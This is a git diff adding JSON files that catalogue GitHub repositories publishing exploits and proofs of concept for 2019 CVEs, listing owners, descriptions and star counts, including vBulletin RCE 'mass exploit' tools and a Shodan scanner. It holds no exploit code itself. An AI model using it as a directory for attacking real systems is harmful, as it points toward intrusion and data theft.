a/2019/CVE-2019-16759.json b/2019/CVE-2019-16759.json new file mode 100644 index 0000000000..9bab1a2e97 --- /dev/null +++ b/2019/CVE-2019-16759.json @@ -0,0 +1,426 @@ +[ + { + "id": 210888122, + "name": "CVE-2019-16759-Vbulletin-rce-exploit", + "full_name": "M0sterHxck\/CVE-2019-16759-Vbulletin-rce-exploit", + "owner": { + "login": "M0sterHxck", + "id": 32819554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32819554?v=4", + "html_url": "https:\/\/github.com\/M0sterHxck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0sterHxck\/CVE-2019-16759-Vbulletin-rce-exploit", + "description": "Vbulletin rce exploit CVE-2019-16759", + "fork": false, + "created_at": "2019-09-25T16:12:27Z", + "updated_at": "2024-08-12T19:53:21Z", + "pushed_at": "2023-05-26T22:26:47Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "16759", + "cve", + "cve2019", + "exploit", + "exploiter", + "python", + "vbulletin" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 210991486, + "name": "http-vuln-CVE-2019-16759", + "full_name": "r00tpgp\/http-vuln-CVE-2019-16759", + "owner": { + "login": "r00tpgp", + "id": 29351179, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29351179?v=4", + "html_url": "https:\/\/github.com\/r00tpgp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tpgp\/http-vuln-CVE-2019-16759", + "description": "Nmap NSE Script to Detect vBulletin pre-auth 5.x RCE CVE-2019-16759", + "fork": false, + "created_at": "2019-09-26T03:27:17Z", + "updated_at": "2022-08-30T10:48:02Z", + "pushed_at": "2019-09-26T03:35:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-16759", + "nmap", + "nse" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 210995647, + "name": "CVE-2019-16759", + "full_name": "jas502n\/CVE-2019-16759", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-16759", + "description": "vBulletin 5.x 未授权远程代码执行漏洞", + "fork": false, + "created_at": "2019-09-26T03:56:22Z", + "updated_at": "2024-08-12T19:53:22Z", + "pushed_at": "2019-09-26T04:25:36Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 212392680, + "name": "vbulletin5-rce", + "full_name": "theLSA\/vbulletin5-rce", + "owner": { + "login": "theLSA", + "id": 28248956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28248956?v=4", + "html_url": "https:\/\/github.com\/theLSA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theLSA\/vbulletin5-rce", + "description": "CVE-2019-16759 vbulletin 5.0.0 till 5.5.4 pre-auth rce", + "fork": false, + "created_at": "2019-10-02T16:46:43Z", + "updated_at": "2024-08-12T19:53:36Z", + "pushed_at": "2020-08-11T15:13:03Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-16759", + "rce", + "vbulletin5" + ], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 214698783, + "name": "CVE-2019-16759", + "full_name": "FarjaalAhmad\/CVE-2019-16759", + "owner": { + "login": "FarjaalAhmad", + "id": 45895453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45895453?v=4", + "html_url": "https:\/\/github.com\/FarjaalAhmad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FarjaalAhmad\/CVE-2019-16759", + "description": "Interactive-Like Command-Line Console for CVE-2019-16759", + "fork": false, + "created_at": "2019-10-12T18:51:16Z", + "updated_at": "2023-01-28T10:07:41Z", + "pushed_at": "2019-10-12T18:56:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 230790251, + "name": "pwn-vbulletin", + "full_name": "andripwn\/pwn-vbulletin", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/pwn-vbulletin", + "description": "Identify vulnerable (RCE) vBulletin 5.0.0 - 5.5.4 instances using Shodan (CVE-2019-16759)", + "fork": false, + "created_at": "2019-12-29T18:49:15Z", + "updated_at": "2022-07-30T18:14:45Z", + "pushed_at": "2020-09-20T16:24:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rce", + "remote-code-execution", + "scanner-web" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 242010562, + "name": "vbull", + "full_name": "psychoxploit\/vbull", + "owner": { + "login": "psychoxploit", + "id": 61023708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61023708?v=4", + "html_url": "https:\/\/github.com\/psychoxploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/psychoxploit\/vbull", + "description": "Mass Exploit CVE-2019-16759", + "fork": false, + "created_at": "2020-02-20T23:14:52Z", + "updated_at": "2024-08-12T19:57:57Z", + "pushed_at": "2020-02-29T21:05:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 287079968, + "name": "CVE-2019-16759-bypass", + "full_name": "polar1s7\/CVE-2019-16759-bypass", + "owner": { + "login": "polar1s7", + "id": 60358264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60358264?v=4", + "html_url": "https:\/\/github.com\/polar1s7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polar1s7\/CVE-2019-16759-bypass", + "description": null, + "fork": false, + "created_at": "2020-08-12T17:54:52Z", + "updated_at": "2020-08-12T17:54:54Z", + "pushed_at": "2020-08-12T17:29:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 287360759, + "name": "CVE-2019-16759", + "full_name": "nako48\/CVE-2019-16759", + "owner": { + "login": "nako48", + "id": 40161320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40161320?v=4", + "html_url": "https:\/\/github.com\/nako48", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nako48\/CVE-2019-16759", + "description": "Vbulletin RCE Exploit", + "fork": false, + "created_at": "2020-08-13T19:11:37Z", + "updated_at": "2024-08-12T20:04:40Z", + "pushed_at": "2020-09-02T09:24:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 287999946, + "name": "CVE-2019-16759", + "full_name": "0xdims\/CVE-2019-16759", + "owner": { + "login": "0xdims", + "id": 56929526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56929526?v=4", + "html_url": "https:\/\/github.com\/0xdims", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xdims\/CVE-2019-16759", + "description": "This tools will extracts and dumps Email + SMTP from vBulletin database server", + "fork": false, + "created_at": "2020-08-16T18:17:33Z", + "updated_at": "2024-08-12T20:04:47Z", + "pushed_at": "2020-08-16T21:19:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 289977484, + "name": "CVE-2019-16759", + "full_name": "sunian19\/CVE-2019-16759", + "owner": { + "login": "sunian19", + "id": 53205380, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53205380?v=4", + "html_url": "https:\/\/github.com\/sunian19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunian19\/CVE-2019-16759", + "description": null, + "fork": false, + "created_at": "2020-08-24T16:15:10Z", + "updated_at": "2020-08-26T06:48:16Z", + "pushed_at": "2020-08-24T16:25:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 291726680, + "name": "vBulletin_Routestring-RCE", + "full_name": "ludy-dev\/vBulletin_Routestring-RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/vBulletin_Routestring-RCE", + "description": "(CVE-2019-16759) vBulletin_Routestring-RCE", + "fork": false, + "created_at": "2020-08-31T13:44:15Z", + "updated_at": "2020-11-07T20:15:29Z", + "pushed_at": "2020-11-07T20:15:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 316889342, + "name": "CVE-2019-16759", + "full_name": "fxp0-4tx\/CVE-2019-16759", + "owner": { + "login": "fxp0-4tx", + "id": 64033972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64033972?v=4", + "html_url": "https:\/\/github.com\/fxp0-4tx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fxp0-4tx\/CVE-2019-16759", + "description": "Vbulletin RCE Exploits", + "fork": false, + "created_at": "2020-11-29T06:19:36Z", + "updated_at": "2022-06-25T08:09:03Z", + "pushed_at": "2020-09-06T21:57:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16784.json b/2019/CVE-2019-16784.json new file mode 100644 index 0000000000..aabd3a0bc2 --- /dev/null +++ b/2019/CVE-2019-16784.json @@ -0,0 +1,64 @@ +[ + { + "id": 235578521, + "name": "PyInstallerPrivEsc", + "full_name": "AlterSolutions\/PyInstallerPrivEsc", + "owner": { + "login": "AlterSolutions", + "id": 42841703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42841703?v=4", + "html_url": "https:\/\/github.com\/AlterSolutions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlterSolutions\/PyInstallerPrivEsc", + "description": "Exploit for PyInstaller CVE-2019-16784", + "fork": false, + "created_at": "2020-01-22T13:23:45Z", + "updated_at": "2023-12-19T02:54:02Z", + "pushed_at": "2023-10-13T14:27:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 735339499, + "name": "CVE-2019-16784-POC", + "full_name": "Ckrielle\/CVE-2019-16784-POC", + "owner": { + "login": "Ckrielle", + "id": 22597407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22597407?v=4", + "html_url": "https:\/\/github.com\/Ckrielle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ckrielle\/CVE-2019-16784-POC", + "description": "A Proof of Concept exploit for the PyInstaller CVE-2019-16783", + "fork": false, + "created_at": "2023-12-24T14:53:28Z", + "updated_at": "2023-12-24T15:22:53Z", + "pushed_at": "2023-12-24T15:22:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16889.json b/2019/CVE-2019-16889.json new file mode 100644 index 0000000000..26013ec144 --- /dev/null +++ b/2019/CVE-2019-16889.json @@ -0,0 +1,33 @@ +[ + { + "id": 226750951, + "name": "CVE-2019-16889-poc", + "full_name": "grampae\/CVE-2019-16889-poc", + "owner": { + "login": "grampae", + "id": 36344197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36344197?v=4", + "html_url": "https:\/\/github.com\/grampae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grampae\/CVE-2019-16889-poc", + "description": "Proof of conecept for CVE-2019-16889 (Resource consumption on Ubiquiti Edgemax 1.10.6 and earlier", + "fork": false, + "created_at": "2019-12-09T00:09:08Z", + "updated_at": "2024-05-27T10:50:48Z", + "pushed_at": "2019-12-22T20:22:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16920.json b/2019/CVE-2019-16920.json new file mode 100644 index 0000000000..3a19f9cdd9 --- /dev/null +++ b/2019/CVE-2019-16920.json @@ -0,0 +1,33 @@ +[ + { + "id": 215423412, + "name": "CVE-2019-16920-MassPwn3r", + "full_name": "eniac888\/CVE-2019-16920-MassPwn3r", + "owner": { + "login": "eniac888", + "id": 10148470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10148470?v=4", + "html_url": "https:\/\/github.com\/eniac888", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eniac888\/CVE-2019-16920-MassPwn3r", + "description": "Exploit and Mass Pwn3r for CVE-2019-16920", + "fork": false, + "created_at": "2019-10-16T00:42:59Z", + "updated_at": "2022-07-18T20:57:37Z", + "pushed_at": "2019-10-15T17:55:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16941.json b/2019/CVE-2019-16941.json new file mode 100644 index 0000000000..e82aa8dc91 --- /dev/null +++ b/2019/CVE-2019-16941.json @@ -0,0 +1,33 @@ +[ + { + "id": 212068191, + "name": "CVE-2019-16941", + "full_name": "purpleracc00n\/CVE-2019-16941", + "owner": { + "login": "purpleracc00n", + "id": 47504061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47504061?v=4", + "html_url": "https:\/\/github.com\/purpleracc00n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purpleracc00n\/CVE-2019-16941", + "description": "PoC for CVE-2019-16941", + "fork": false, + "created_at": "2019-10-01T10:26:27Z", + "updated_at": "2020-08-13T19:25:51Z", + "pushed_at": "2019-10-03T18:08:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1698.json b/2019/CVE-2019-1698.json new file mode 100644 index 0000000000..eb8a2755f6 --- /dev/null +++ b/2019/CVE-2019-1698.json @@ -0,0 +1,33 @@ +[ + { + "id": 836111601, + "name": "CVE-2019-1698", + "full_name": "raytran54\/CVE-2019-1698", + "owner": { + "login": "raytran54", + "id": 89938940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89938940?v=4", + "html_url": "https:\/\/github.com\/raytran54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raytran54\/CVE-2019-1698", + "description": null, + "fork": false, + "created_at": "2024-07-31T07:12:03Z", + "updated_at": "2024-07-31T16:43:04Z", + "pushed_at": "2024-07-31T16:43:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17026.json b/2019/CVE-2019-17026.json new file mode 100644 index 0000000000..3bf9dba937 --- /dev/null +++ b/2019/CVE-2019-17026.json @@ -0,0 +1,64 @@ +[ + { + "id": 290864437, + "name": "CVE-2019-17026-Exploit", + "full_name": "maxpl0it\/CVE-2019-17026-Exploit", + "owner": { + "login": "maxpl0it", + "id": 27973683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27973683?v=4", + "html_url": "https:\/\/github.com\/maxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maxpl0it\/CVE-2019-17026-Exploit", + "description": "An exploit for CVE-2019-17026. It pops xcalc and was tested on Ubuntu (x64).", + "fork": false, + "created_at": "2020-08-27T19:32:07Z", + "updated_at": "2024-08-12T20:05:12Z", + "pushed_at": "2020-08-27T19:33:42Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 48, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 341906843, + "name": "CVE-2019-17026", + "full_name": "lsw29475\/CVE-2019-17026", + "owner": { + "login": "lsw29475", + "id": 13043359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4", + "html_url": "https:\/\/github.com\/lsw29475", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsw29475\/CVE-2019-17026", + "description": null, + "fork": false, + "created_at": "2021-02-24T13:18:54Z", + "updated_at": "2022-08-18T07:51:59Z", + "pushed_at": "2021-02-24T13:19:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17041.json b/2019/CVE-2019-17041.json new file mode 100644 index 0000000000..469fb4c689 --- /dev/null +++ b/2019/CVE-2019-17041.json @@ -0,0 +1,33 @@ +[ + { + "id": 318732411, + "name": "CVE-2019-17041", + "full_name": "Resery\/CVE-2019-17041", + "owner": { + "login": "Resery", + "id": 50428593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50428593?v=4", + "html_url": "https:\/\/github.com\/Resery", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Resery\/CVE-2019-17041", + "description": null, + "fork": false, + "created_at": "2020-12-05T07:49:11Z", + "updated_at": "2023-01-10T03:22:16Z", + "pushed_at": "2020-12-05T07:50:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17080.json b/2019/CVE-2019-17080.json new file mode 100644 index 0000000000..cfc2070f66 --- /dev/null +++ b/2019/CVE-2019-17080.json @@ -0,0 +1,64 @@ +[ + { + "id": 212289598, + "name": "Mintinstall-object-injection", + "full_name": "Andhrimnirr\/Mintinstall-object-injection", + "owner": { + "login": "Andhrimnirr", + "id": 38662689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38662689?v=4", + "html_url": "https:\/\/github.com\/Andhrimnirr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Andhrimnirr\/Mintinstall-object-injection", + "description": "CVE-2019-17080 ", + "fork": false, + "created_at": "2019-10-02T08:26:34Z", + "updated_at": "2020-10-23T15:51:33Z", + "pushed_at": "2019-10-08T16:58:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 216088358, + "name": "Mintinstall-object-injection", + "full_name": "materaj2\/Mintinstall-object-injection", + "owner": { + "login": "materaj2", + "id": 46865671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46865671?v=4", + "html_url": "https:\/\/github.com\/materaj2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/materaj2\/Mintinstall-object-injection", + "description": "CVE-2019-17080 ", + "fork": false, + "created_at": "2019-10-18T18:52:17Z", + "updated_at": "2020-07-21T10:59:38Z", + "pushed_at": "2019-10-08T16:58:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17124.json b/2019/CVE-2019-17124.json new file mode 100644 index 0000000000..ca5e309c37 --- /dev/null +++ b/2019/CVE-2019-17124.json @@ -0,0 +1,33 @@ +[ + { + "id": 213818580, + "name": "CVE-2019-17124", + "full_name": "hessandrew\/CVE-2019-17124", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2019-17124", + "description": "KRAMER VIAware 2.5.0719.1034 - Remote Code Execution", + "fork": false, + "created_at": "2019-10-09T04:10:25Z", + "updated_at": "2022-04-12T13:41:48Z", + "pushed_at": "2019-10-11T02:32:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17137.json b/2019/CVE-2019-17137.json new file mode 100644 index 0000000000..d00e225d6f --- /dev/null +++ b/2019/CVE-2019-17137.json @@ -0,0 +1,33 @@ +[ + { + "id": 331218977, + "name": "CVE-2019-17137", + "full_name": "vncloudsco\/CVE-2019-17137", + "owner": { + "login": "vncloudsco", + "id": 41409442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41409442?v=4", + "html_url": "https:\/\/github.com\/vncloudsco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vncloudsco\/CVE-2019-17137", + "description": "CVE-2019-17137 POC", + "fork": false, + "created_at": "2021-01-20T06:52:20Z", + "updated_at": "2021-01-20T07:01:10Z", + "pushed_at": "2021-01-20T07:01:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17147.json b/2019/CVE-2019-17147.json new file mode 100644 index 0000000000..355b0e75d1 --- /dev/null +++ b/2019/CVE-2019-17147.json @@ -0,0 +1,33 @@ +[ + { + "id": 448482734, + "name": "CVE-2019-17147_Practice_Material", + "full_name": "DrmnSamoLiu\/CVE-2019-17147_Practice_Material", + "owner": { + "login": "DrmnSamoLiu", + "id": 36998819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36998819?v=4", + "html_url": "https:\/\/github.com\/DrmnSamoLiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DrmnSamoLiu\/CVE-2019-17147_Practice_Material", + "description": "This repo contains dumped flash partitions with firmware version vulnerable to CVE-2019-17147, and some useful binaries to downgrade and debug your WR841N router.", + "fork": false, + "created_at": "2022-01-16T07:08:57Z", + "updated_at": "2024-11-08T19:13:09Z", + "pushed_at": "2022-01-16T14:03:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17195.json b/2019/CVE-2019-17195.json new file mode 100644 index 0000000000..4ebef46862 --- /dev/null +++ b/2019/CVE-2019-17195.json @@ -0,0 +1,33 @@ +[ + { + "id": 335868582, + "name": "weblogic2021", + "full_name": "somatrasss\/weblogic2021", + "owner": { + "login": "somatrasss", + "id": 69829610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69829610?v=4", + "html_url": "https:\/\/github.com\/somatrasss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/somatrasss\/weblogic2021", + "description": "CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109", + "fork": false, + "created_at": "2021-02-04T07:03:56Z", + "updated_at": "2024-08-12T20:10:03Z", + "pushed_at": "2021-09-13T02:58:00Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17221.json b/2019/CVE-2019-17221.json new file mode 100644 index 0000000000..1b0bc9103b --- /dev/null +++ b/2019/CVE-2019-17221.json @@ -0,0 +1,33 @@ +[ + { + "id": 234381096, + "name": "CVE-2019-17221", + "full_name": "h4ckologic\/CVE-2019-17221", + "owner": { + "login": "h4ckologic", + "id": 10551871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10551871?v=4", + "html_url": "https:\/\/github.com\/h4ckologic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4ckologic\/CVE-2019-17221", + "description": "PhantomJS uses internal module: webpage, to open, close, render, and perform multiple actions on webpages, which suffers from an arbitrary file read vulnerability. The vulnerability exists in the page.open() function of the webpage module, which loads the specified URL and calls a given callback. When opening a HTML file, an attacker can supply specially crafted file content, which allows reading arbitrary files on the filesystem. The vulnerability is demonstrated by using page.render() as the function callback, resulting in the generation of a PDF or an image of the targeted file.", + "fork": false, + "created_at": "2020-01-16T18:07:07Z", + "updated_at": "2023-12-18T09:27:25Z", + "pushed_at": "2020-01-16T18:08:13Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17225.json b/2019/CVE-2019-17225.json new file mode 100644 index 0000000000..32b3e6297a --- /dev/null +++ b/2019/CVE-2019-17225.json @@ -0,0 +1,33 @@ +[ + { + "id": 768961539, + "name": "CVE-2019-17225", + "full_name": "hacker625\/CVE-2019-17225", + "owner": { + "login": "hacker625", + "id": 32318573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32318573?v=4", + "html_url": "https:\/\/github.com\/hacker625", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacker625\/CVE-2019-17225", + "description": "Subrion 4.2.1 allows XSS via the panel\/members\/ Username, Full Name, or Email field, aka an \"Admin Member JSON Update\" issue.", + "fork": false, + "created_at": "2024-03-08T03:51:32Z", + "updated_at": "2024-03-08T03:51:33Z", + "pushed_at": "2024-03-08T03:51:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline 